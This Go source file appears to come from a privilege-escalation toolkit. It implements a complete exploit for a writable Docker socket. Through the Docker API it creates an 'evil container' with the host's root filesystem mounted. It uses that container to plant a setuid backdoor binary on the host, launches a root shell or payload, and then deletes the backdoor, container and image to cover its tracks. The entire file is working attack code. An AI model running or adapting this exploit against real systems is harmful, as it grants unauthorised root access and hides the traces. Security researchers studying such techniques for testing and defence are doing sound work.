package dockersock

import (
	"archive/tar"
	"bytes"
	"context"
	"encoding/json"
	"fmt"
	"io"
	"io/ioutil"
	"net"
	"net/http"
	"os"
	"os/exec"
	"path/filepath"
	"strings"
	"syscall"
	"time"

	"github.com/liamg/traitor/pkg/random"

	"github.com/liamg/traitor/pkg/payloads"

	"github.com/liamg/traitor/pkg/logger"

	"github.com/liamg/traitor/pkg/state"
)

type writableDockerSocketExploit struct {
	sockPath string
	client   *http.Client
}

func New() *writableDockerSocketExploit {
	exp := &writableDockerSocketExploit{
		sockPath: "/var/run/docker.sock",
	}
	exp.client = &http.Client{
		Transport: &http.Transport{
			DialContext: func(_ context.Context, _, _ string) (net.Conn, error) {
				return net.Dial("unix", exp.sockPath)
			},
		},
		Timeout: time.Second * 10,
	}
	return exp
}

func (v *writableDockerSocketExploit) IsVulnerable(_ context.Context, _ *state.State, log logger.Logger) bool {
	if syscall.Access(v.sockPath, syscall.O_RDWR) != nil {
		return false
	}

	log.Printf("Docker socket at %s is writable!", v.sockPath)
	return true
}

func (v *writableDockerSocketExploit) Shell(ctx context.Context, s *state.State, log logger.Logger) error {
	return v.Exploit(ctx, s, log, payloads.Defer)
}

func (v *writableDockerSocketExploit) deleteContainer(id string) error {

	req, err := http.NewRequest(http.MethodDelete, fmt.Sprintf("http://localhost/containers/%s?force=1", id), nil)
	if err != nil {
		return err
	}

	resp, err := v.client.Do(req)
	if err != nil {
		return err
	}
	defer resp.Body.Close()

	if resp.StatusCode >= 400 {
		return fmt.Errorf("delete failed, status: %d", resp.StatusCode)
	}
	return nil
}

func (v *writableDockerSocketExploit) deleteImage(name string) error {

	req, err := http.NewRequest(http.MethodDelete, fmt.Sprintf("http://localhost/images/%s?force=1", name), nil)
	if err != nil {
		return err
	}

	resp, err := v.client.Do(req)
	if err != nil {
		return err
	}
	defer resp.Body.Close()

	if resp.StatusCode >= 400 {
		return fmt.Errorf("delete failed, status: %d", resp.StatusCode)
	}
	return nil
}

func (v *writableDockerSocketExploit) Exploit(ctx context.Context, s *state.State, log logger.Logger, payload payloads.Payload) error {

	log.Printf("Building malicious docker image...")

	buffer := bytes.NewBufferString("")
	if err := v.buildTarball(buffer); err != nil {
		return err
	}

	imageName := random.Image()
	resp, err := v.client.Post(
		fmt.Sprintf("http://localhost/build?t=%s", imageName),
		"application/x-tar",
		buffer,
	)
	if err != nil {
		return err
	}
	defer resp.Body.Close()

	if _, err := ioutil.ReadAll(resp.Body); err != nil {
		return err
	}

	if resp.StatusCode == 200 {
		// weird race condition when running an image that was just built - sleeping for a second solves it
		time.Sleep(time.Second)
		return v.exploitWithImage(imageName, true, payload, log)
	}

	log.Printf("Build failed, looking for existing images instead...")

	// we can't download alpine, look at existing images and try to use those
	images, err := v.listLocalImages()
	if err != nil {
		return err
	}
	for _, image := range images {
		if err := v.exploitWithImage(image, false, payload, log); err != nil {
			log.Printf("Exploit failed with image '%s'", image)
			continue
		} else {
			return nil
		}
	}

	return fmt.Errorf("no image available")
}

func (v *writableDockerSocketExploit) buildTarball(writer io.Writer) error {

	tarWriter := tar.NewWriter(writer)
	defer tarWriter.Close()

	dockerfile := `FROM scratch

CMD echo "" > /lol
`
	header := &tar.Header{
		Name:    "Dockerfile",
		Size:    int64(len(dockerfile)),
		Mode:    0644,
		ModTime: time.Now(),
	}

	if err := tarWriter.WriteHeader(header); err != nil {
		return err
	}

	if _, err := io.Copy(tarWriter, strings.NewReader(dockerfile)); err != nil {
		return err
	}

	return nil
}

func (v *writableDockerSocketExploit) listLocalImages() ([]string, error) {

	resp, err := v.client.Get(
		"http://localhost/images/json",
	)
	if err != nil {
		return nil, err
	}
	if resp.StatusCode != http.StatusOK {
		return nil, fmt.Errorf("failed to list images")
	}
	defer resp.Body.Close()

	data, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		return nil, err
	}

	var images []struct {
		Tags []string `json:"RepoTags"`
	}
	if err := json.Unmarshal(data, &images); err != nil {
		return nil, err
	}

	var imageList []string
	for _, image := range images {
		imageList = append(imageList, image.Tags...)
	}

	return imageList, nil
}

func (v *writableDockerSocketExploit) exploitWithImage(image string, removeAfterwards bool, payload payloads.Payload, log logger.Logger) error {

	binPath, err := exec.LookPath("sh")
	if err != nil {
		binPath = "/"
	} else {
		binPath = filepath.Dir(binPath)
	}

	path := filepath.Join(binPath, random.Filename())

	me, err := os.Executable()
	if err != nil {
		return err
	}

	log.Printf("Creating evil container...")
	creationData := fmt.Sprintf(`
{"Image":"%s","Cmd":["/pwn%s", "backdoor", "install", "/pwn%s"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target": "/pwn"}]}`,
		image, me, path)

	resp, err := v.client.Post("http://localhost/containers/create", "application/json", strings.NewReader(creationData))
	if err != nil {
		return err
	}
	defer resp.Body.Close()
	if resp.StatusCode != 201 {
		return fmt.Errorf("docker api error - unexpected status code: %d", resp.StatusCode)
	}

	data, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		return err
	}

	container := struct {
		ID string `json:"Id"`
	}{}
	if err := json.Unmarshal(data, &container); err != nil {
		return err
	}

	if container.ID == "" {
		return fmt.Errorf("failed to start container: %s", string(data))
	}

	log.Printf("Starting evil container...")
	respStart, err := v.client.Post(fmt.Sprintf("http://localhost/containers/%s/start", container.ID), "application/json", nil)
	if err != nil {
		return err
	}
	_, _ = io.Copy(io.Discard, respStart.Body)
	defer respStart.Body.Close()
	if respStart.StatusCode != 204 {
		return fmt.Errorf("docker api error - unexpected status code: %d", respStart.StatusCode)
	}

	log.Printf("Backdooring host at %s from guest...", path)
	waitResp, err := v.client.Post(fmt.Sprintf("http://localhost/containers/%s/wait", container.ID), "application/json", nil)
	if err != nil {
		return err
	}
	defer waitResp.Body.Close()
	if waitResp.StatusCode != 200 {
		return fmt.Errorf("docker api error - unexpected status code: %d", waitResp.StatusCode)
	}
	_, _ = io.Copy(ioutil.Discard, waitResp.Body)

	// race condition immediately after setting setuid?
	time.Sleep(time.Second * 10)

	log.Printf("Checking permissions...")
	info, err := os.Stat(path)
	if err != nil {
		return err
	}
	if info.Mode()&os.ModeSetuid == 0 {
		return fmt.Errorf("setuid is not set: %o", info.Mode())
	}

	log.Printf("Starting root shell...")
	cmd := exec.Cmd{
		Path:   path,
		Args:   []string{path, "setuid"},
		Env:    os.Environ(),
		Dir:    "/",
		Stdin:  os.Stdin,
		Stdout: os.Stdout,
		Stderr: os.Stderr,
	}
	if payload != "" {
		cmd.Args = append(cmd.Args, "-c", string(payload))
	}
	if err := cmd.Start(); err != nil {
		return err
	}

	log.Printf("Removing backdoor from host...")
	if err := (&exec.Cmd{
		Path: path,
		Args: []string{path, "backdoor", "uninstall"},
		Env:  os.Environ(),
	}).Run(); err != nil {
		return err
	}

	log.Printf("Removing container...")
	if err := v.deleteContainer(container.ID); err != nil {
		return err
	}

	if removeAfterwards {
		log.Printf("Cleaning up image...")
		if err := v.deleteImage(image); err != nil {
			return err
		}
	}

	if payload == payloads.Defer {
		log.Printf("Dropping you into a shell...")
	} else {
		log.Printf("Running payload...")
	}
	return cmd.Wait()
}
